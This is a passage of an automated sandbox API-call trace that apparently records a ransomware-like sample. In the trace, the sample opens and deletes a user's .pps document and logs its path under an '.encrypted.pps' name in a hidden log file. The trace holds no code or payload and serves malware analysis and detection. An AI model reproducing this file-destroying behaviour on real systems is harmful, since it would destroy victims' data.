hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.676] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.676] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.677] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\m6n9gns1e7rnh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0033.677] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.678] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.678] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.678] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.678] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.678] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.679] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.679] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.679] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.679] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", lpFilePart=0x0) returned 0x5c [0033.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x13f57740, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 0x7c2100 [0033.679] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\m6n9gns1e7rnh.pps")) returned 1 [0033.680] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x13f57740, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 0 [0033.680] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.680] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.681] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.681] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.681] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.681] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.681] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.682] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.682] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.682] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.682] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x116e, lpOverlapped=0x0) returned 1 [0033.682] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x116e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.682] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.encrypted.pps\r\n", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0033.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x69) returned 0x7db300 [0033.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.encrypted.pps\r\n", cchWideChar=105, lpMultiByteStr=0x7db300, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\M6n9gNS1E7rNH.encrypted.pps\r\n", lpUsedDefaultChar=0x0) returned 105 [0033.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0033.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0033.683] WriteFile (in: hFile=0x140, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x68, lpOverlapped=0x0) returned 1 [0033.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.683] CloseHandle (hObject=0x140) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.684] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.684] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.685] HeapFree (in: 